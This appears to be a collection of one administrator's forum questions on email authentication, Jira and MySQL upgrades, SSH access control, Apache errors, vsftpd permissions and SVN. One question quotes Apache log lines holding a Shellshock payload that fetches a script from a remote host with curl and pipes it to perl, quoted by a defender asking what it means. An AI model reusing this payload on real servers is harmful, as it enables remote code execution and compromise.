John's questions

Pretty new to spf/dkim and dmark.

After setting this up just this morning I already got a report on a new website. Our service eamils our users via sendgrid and the rest of the emails are sent from our google workspace accounts.

Our SPF looks like the following:

v=spf1 include:_spf.google.com include:sendgrid.net ~all 

Google is authenticing the DKIM records, based on their control panel, I can only "stop authenticating" (How long should it take for google to authenticate a DKIM TXT DNS entry?)

The dmarc dns record looks like:

v=DMARC1; p=none; rua=mailto:[email protected]; ruf=mailto:[email protected]; fo=0;

So based on this I'm not sure if the screenshot report is saying I have things configured wrong, or if someone tried to send an email fraudulently.. and if it is the latter, what should I do about it?

The 2nd IP is making me think I have thinks ill-configured as it comes from sendgrid: https://whatismyipaddress.com/ip/168.245.72.219

I have an instance on jira and a new database mysql 8.

After following the guides (https://confluence.atlassian.com/jiracore/connecting-jira-to-mysql-8-0-1018272102.html) I ended up here:

https://dev.mysql.com/downloads/connector/j/

But unless I am missing something.. i can only seem to be able to download a .deb from there.

Java on mysql 5 used a .jar file.. how do i install or extract the .jar file from the .deb download?

We are setting up our outreach management for a new startup.

The app primary email domain is something like app.com

Emails we send out will be via a new domain, something like app-email.com.

We use google workplace, adding another domain is ok but we can either do so as a secondary or alias domain. An alias is best for our end as all emails will be in 1 inbox.. but this might not be the best overall.

The reason we are advised to setup a 2nd domain is for mitigating the risk of being blacklisted during an outreach campaign. Should the email address's domain get marked as spam (then we are doing emails very wrong we know) then at least our app's primary domain is safe.

This practice can be seen from many providers, even apple do this.

My question is:

The 2nd domain can added as an alias or a secondary email in google, but is an alias safe or will our primary domain still be at risk of being pulled onto a blacklist through the alias relation?

Or

Is it possible to even send an email from an alias email?

I have confluence and jira running on a standalone server.

I just upgraded confluence - no problems. It runs connected to mysql and is up as we speak on the latest version.

I just updated jira but it says it cannot connect to the database:

Database: We've found an error in MySQL supported version! The database type in your dbconfig.xml is set up to MySQL 5.7 and your MySQL version is different. Consider using MySQL 5.7 database type instead See our documentation for more information on changing database type.

But the database config or database version never changed.

I updated the .jar from mysql-connector-java-5.1.48 to:

mysql-connector-java-5.1.48-bin.jar

But still wont connect.

The dbconfig looks like:

<?xml version="1.0" encoding="UTF-8"?>

<jira-database-config>
  <name>defaultDS</name>
  <delegator-name>default</delegator-name>
  <database-type>mysql57</database-type>
  <jdbc-datasource>
    <url>jdbc:mysql://dbserver:3306/jiradb?useUnicode=true&amp;characterEncoding=UTF8&amp;sessionVariables=default_storage_engine=InnoDB</url>
    <driver-class>com.mysql.jdbc.Driver</driver-class>
    <username>jiradb</username>
    <password>somepassword</password>
    <pool-min-size>20</pool-min-size>
    <pool-max-size>20</pool-max-size>
    <pool-max-wait>30000</pool-max-wait>
    <validation-query>select 1</validation-query>
    <min-evictable-idle-time-millis>60000</min-evictable-idle-time-millis>
    <time-between-eviction-runs-millis>300000</time-between-eviction-runs-millis>
    <pool-max-idle>20</pool-max-idle>
    <pool-remove-abandoned>true</pool-remove-abandoned>
    <pool-remove-abandoned-timeout>300</pool-remove-abandoned-timeout>
    <pool-test-on-borrow>false</pool-test-on-borrow>
    <pool-test-while-idle>true</pool-test-while-idle>
    <validation-query-timeout>3</validation-query-timeout>
  </jdbc-datasource>
</jira-database-config>

Without rolling back everything I don't know what to do, has anyone else hit similar issues?

I have rolled back the entire server (complete with database) but JIRA still will not start :/ does anyone have any ideas?

Managing multiple servers, in excess of 90 currently with 3 devops via Ansible. All is working great, however there is a giant security problem right now. Each devop is using their own local ssh key to gain access directly to the servers. Each devop uses a laptop, and each laptop potentially could be be compromised thus opening the entire network of prod servers up to an attack.

I am looking for a solution to centrally manage access, and thus block access for any given key. Not dissimilar to how keys are added to bitbucket or github.

Off the top of my head I would assume the solution would be a tunnel from one machine, the gateway, to the desired prod server... while passing the gateway the request would pick up a new key and use to gain access to the prod server. The result would be we can quickly and efficiently kill access for any devop within seconds by just denying access to the gateway.

Is this good logic? Has anyone seen a solution out there already to thwart this problem?

I have a web application that injects content into the users page dynamically via ajax at the click of a button.

A user may click the button multiple time in quick succession.

In increasing the hardening score on the server in question, i am thinking about installing mod_evasive.

https://www.linode.com/docs/websites/apache-tips-and-tricks/modevasive-on-apache

DOSPageCount This is the threshold for the number of requests for the same page (or URI) per page interval. Once the threshold for that interval has been exceeded, the IP address of the client will be added to the blocking list.

Is this not going to render all users of my application, blocked?

If I was to write a DDOS script i would alter the url it hit on each cycle.. but then mod_evasive has this:

DOSSiteCount This is the threshold for the total number of requests for any object by the same client on the same listener per site interval. Once the threshold for that interval has been exceeded, the IP address of the client will be added to the blocking list.

Has anyone any tips on using mod_evasive on an ajax drive web application?

drwxrwxrwt  2 root     root     4096 Aug 20  2015 .font-unix
drwxrwxrwt  2 root     root     4096 Aug 20  2015 .ICE-unix
-rw-------  1 root     root        0 Aug 20  2015 ipt.err
-rw-------  1 root     root       90 Aug 20  2015 ipt.out
drwxr-xr-x  3 root     root     4096 Mar 28 16:23 npm-23008-fc1739e3
drwxrwxrwt  2 root     root     4096 Aug 20  2015 .Test-unix
drwx------  2 root     root     4096 May 11 03:00 tmp.ayv48eJWjN
drwx------  2 root     root     4096 Apr  5 14:55 tmp.DhPr9EXfH5
drwx------  2 root     root     4096 Apr  5 15:11 tmp.DVHx8GHsP4
drwx------  2 root     root     4096 Apr  5 14:45 tmp.FDa39cA3ft
drwx------  2 root     root     4096 May  4 03:00 tmp.fvjOmYe2WQ
drwx------  2 root     root     4096 May 25 03:00 tmp.GEHVHEq0Vf
drwx------  2 john     john     4096 May 12 07:06 tmp.hpMfMe2Dlw
drwx------  2 root     root     4096 Apr  5 12:57 tmp.M543QjpOej
drwx------  2 root     root     4096 Apr 20 03:00 tmp.oruELImlbd
drwx------  2 root     root     4096 Feb 12 22:28 tmp.OV7qrrSCbt
drwx------  2 root     root     4096 Apr 13 03:00 tmp.oyJKXfMa52
drwx------  2 john     john     4096 May 12 07:10 tmp.qqHnbm5bEN
drwx------  2 root     root     4096 Feb 12 22:46 tmp.RRRN63RvPS
drwx------  2 root     root     4096 Feb 12 22:28 tmp.tDLx4KXKjY
drwx------  2 root     root     4096 Apr 27 03:00 tmp.Yp1DDIZUXI
drwxr-xr-x  3 www-data www-data 4096 Mar 28 16:25 www-data
drwxrwxrwt  2 root     root     4096 Aug 20  2015 .X11-unix
drwxrwxrwt  2 root     root     4096 Aug 20  2015 .XIM-unix

After running Lynis test on a server I noticed it was suggesting to remove old files in the temp folder.

When I went to examine the contents, I noticed that some of the directories in the tmp folder has 777 permissions on them!

drwxrwxrwt  2 root     root     4096 Aug 20  2015 .font-unix
drwxrwxrwt  2 root     root     4096 Aug 20  2015 .ICE-unix
drwxrwxrwt  2 root     root     4096 Aug 20  2015 .Test-unix
drwxrwxrwt  2 root     root     4096 Aug 20  2015 .X11-unix
drwxrwxrwt  2 root     root     4096 Aug 20  2015 .XIM-unix

I don't know too much about these. Are they safe?

OK, it has been a while since I have configured a virtual box from scratch.

1. Fresh install of ubuntu 14.0.4.3 lts

2. no proxy or anything fancy

3. the network adapter is set to bridged

4. after the os installed and booted I can

   a. ping the box from windows with success

   b. from within the box i can ping 8.8.8.8 with success (and other domains)

The problem is, I cannot get the box to run with success apt-get update. It just hangs at 0% which indicated to me that either the url it was access is not responding (gb.archive.ubuntu.com).. but it does respond in a browser, or the box could not make a connection to the www.. but then i can ping other domains.

Is there something I am missing? Why can I not get apt-get to work?

early this morning there was a log rotation, the last line in the apache error log was:

 [error] (9)Bad file descriptor: apr_socket_accept: (client socket)    apache2: Syntax error on line 250 of /etc/apache2/apache2.conf: Syntax error on line 1 of /etc/apache2/mods-enabled/alias.load: Cannot load /usr/lib/apache2/modules/mod_alias.so into server: /usr/lib/apache2/modules/mod_alias.so: failed to map segment from shared object: Cannot allocate memory

Apache failed to auto reload after this. When I got around to looking at this an hour or so later, i simply did an apache restart and everything was fine. It did leave a warning in the new log file:

[warn] pid file /var/run/apache2.pid overwritten -- Unclean shutdown of previous Apache run?

What does this mean, and how can I correct what ever went wrong?

(Apache/2.2.22 (Debian))

edit or if this is not something that can be fixed, is there a way of getting apache to auto reload x qty of times before giving up (like pm2 with node)?

Typically my apache error logs get hit with a large volume of the typical 'phpmyadmin' (requests and a huge qty of spelling variations), wordpress admin, joomla and a whole load more.

But last night my server got hit with an unusually high volume of a new type:

[Mon Oct 27 20:22:58 2014] [error] [client 46.105.118.179] File does not exist: /var/www/details.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl

And

[Mon Oct 27 20:22:59 2014] [error] [client 46.105.118.179] script not found or unable to stat: /usr/lib/cgi-bin/zml.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | p$

They all are after slight variations of the above two.

Has anyone else seen this? What are they after? Are there any extra security precautions that I might be able to put in place for such attacks?

rsync -avz D:/test [email protected]:/test

I am using cwrsync on a windows7 box rsyncing to a linux box.

Everything works fine when i am going from a relative path on drive C.. but i need to rsync from another hdd in my windows box, drive d.

When i run the above line rsync moans that "the source and destination cannot both be remote ".

How can i get rsync to look at a directory on drive d?

The same line from a folder in drive c works fine:

rsync -avz /test [email protected]:/test

On a mac the 2nd hdd is mounted through Volumes and the rsync can access the files through that, is there anything similar in windows?

54.204.131.75 - - [09/Jul/2014:17:53:43 +0100] "HEAD / HTTP/1.1" 200 283 "-" "Cloud mapping experiment. Contact [email protected]"

A new line in my access log the other day. As far as i can tell this is most likely a phishing scam. Does anyone know if I might be wrong.

I can see little more trace on my machine of any damage. The log was recorded 3 time over the course of an hour or so.

I am running a webapp from a uk datacenter. Speed is fine as expected. The webapp relies heavily on a database. I would like to open the webapp to Australia and New Zealand but maintain good response time from the server.

Essentially the each user in the app has access to data stored in two tables in the db. Each user uses said data to generate their own combination of this data and store in other tables in the db. There are few asset updates to the app.

Registered emails would need to be unique in all countries.

From my limited knowledge in this area I believe there are two options: A - Full database replication between two hosts, one in the UK and one in AUS B - Periodic replication of data from a source host, the uk, to the targets, in aus and nz.

This then leaves the domain 1 - Ideally on domain would be best however this would need a routing server of sorts to direct traffic based on location to different servers, but this would increase response time 2 - Have alternate domains per country routing directly to the country local host

I appreciate I am not reinventing the wheel here but what is the std protocol for a scenario like this? A cdn service from my understanding here is more for image and video delivery, i suppose the base question here is what is the equivalent for databases?

Thanks for any help, John

I have just upgraded my Ubuntu 12 server to php 5.5.7 which in turn automatically upgraded my installation of Apache to 2.4.6. After the upgrade my previous installation of SVN running with WebDAV has now stopped working.

When I try installing subversion and libapache2-svn I get the following:

root@Svr01:/# apt-get install subversion libapache2-svn
Reading package lists... Done
Building dependency tree
Reading state information... Done
subversion is already the newest version.
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
  libapache2-svn : Depends: apache2.2-common but it is not going to be installed
E: Unable to correct problems, you have held broken packages.

"The following packages have unmet dependencies: libapache2-svn : Depends: apache2.2-common but it is not going to be installed"

I am assuming this means that SVN simply does not work with Apache 2.4.6 yet?

Does anyone know a way around this?

I am attempting to set up a scenario in which I do not require to submit a password to ssh into an ubuntu machine from a mac. This is procedure i have been following:

1 - Open a terminal in your mac and remain logged in as you, not root.

2 - ssh-keygen (when asked for a password leave blank, the purpose of this s for rsync to be able to ssh without a password prompt)

3 - cat ~/.ssh/id_rsa.pub

This will have made an SSH key which will now be living in your home folder. Now you need to add the public key into the ubuntu VM

1 – Login as root into the vm

2 – mkdir /home/john/.ssh/

3 - nano /home/john/.ssh/authorized_keys copy the key generated on you mac into the ida_rsa.pub and paste into this file

4 – chown –R john /home/john/.ssh/

5 – chmod 600 /home/john

The result of this is, I have the key in both home directories. But when i ssh [email protected] i still get asked for a pword..

Any ideas?

Is there a config that must be setup in ssh within the ubuntu machine to allow this behaviour to happen?

I have just seen a new series of error in the /var/log/apache2/error.log

[Thu Oct 31 06:59:04 2013] [error] [client 203.197.197.18] script not found or unable to stat: /usr/lib/cgi-bin/php

[Thu Oct 31 06:59:08 2013] [error] [client 203.197.197.18] script not found or unable to stat: /usr/lib/cgi-bin/php5

[Thu Oct 31 06:59:09 2013] [error] [client 203.197.197.18] script not found or unable to stat: /usr/lib/cgi-bin/php-cgi

[Thu Oct 31 06:59:14 2013] [error] [client 203.197.197.18] script not found or unable to stat: /usr/lib/cgi-bin/php.cgi

[Thu Oct 31 06:59:14 2013] [error] [client 203.197.197.18] script not found or unable to stat: /usr/lib/cgi-bin/php4

This server is running Ubuntu 12.04lts.

I have never seen this sort of attack before, should i be concerned or securing my system in any way for them?

Thanks, John

Server running Ubuntu 12.04 lts

I installed munin the other day on a server. I decided later to remove it with apt-get.

I noticed that not everything was removed from the installation so manually removed the munin web directory and also removed the munin user-name and group from the sever.

However I have just now tried to run apt-get upgrade which is now returning an error:

dpkg: unrecoverable fatal error, aborting: syntax error: unknown user 'munin' in statoverride file E: Sub-process /usr/bin/dpkg returned an error code (2)

I am now out of my depth. What does this mean? Google results have not really been helpful.

Can anyone help?

Thanks, John

Ok, so i frequently check my logs and see an array of errors logs from people "scoping the joint" but today i noticed a new one:

[client 157.56.229.87] attempt to invoke directory as script: /usr/lib/cgi-bin/

This IP range had actually caused this error log a few times now but i cannot find out what it means..

I am assuming this is a hack attempt but does anyone know what they are trying to do and how to protect against it?

Thanks,

John

I have the following config on my Ubuntu 12 server:

1 - vsftpd installed and configured with the config file settings:

listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
dir_message_enable=YES
use_locatime=YES
xferlog_enable=YES
connect_from_port_20=YES

chroot_local_user=YES
#chroot_list_enable=YES  (commented out)
chroot_list_file=/etc/vsftpd.chroot_list

secure_choot_dir=/var/run/vsftpd/empty    
pam_service_name=vsftpd    
rsa_cert_file=/ect/ssl/private/vsftpd.pem    
user_config_dir=/etc/vsftpd/user_conf

2 - I have an ftp user setup in which their home directory is

/var/www

3 - When I connect to the server with filezilla with the new ftp username, filezilla automatically shows the webroot, as desired.

The problem is the permissions of the files; every file the ftpuser uploads to the /var/www directory are set so both the owner and the group of the file is of the ftp user.

Also the permissions are

-rw-------

Which of course means every file a try to access through a std browser receives the forbidden warning.

The /var/www's owner is 'www-data' and the group is 'webroot'.

webroot is a group I created separately and added the ftp user to, along with a few others.

How can I best correct this so that a std browser doesn't receive the forbidden warning when trying to view a file uploaded by the ftp user?

I think my server has been hacked but I cannot be sure.

I had installed and got running svn on ubuntu 12.04. After installing I got one machine to checkout the repository on username joe. Last night I checked out the repository on my own machine on username john. But suddenly today I get this message when trying to commit:

'ERROR Repository moved temporarily to 'http://www.mydomain.com'; please relocate'

I don't know where to start looking here, some search results indicate it might be a hook script, other say sloppy config files.

I have svn installed with webDAV. The config file is: /etc/apache2/mods-available/dav_svn.conf:

<Location /backuprepos/filesystem>
DAV svn
SVNPath /home/backuprepos/filesystem
AuthType Basic
AuthName "filesystem subversion repository"
AuthUserFile /etc/subversion/passwd
Require valid-user
</Location>

The passwords I added to the following file:

htpasswd -c /etc/subversion/passwd user_name

Really need to some help..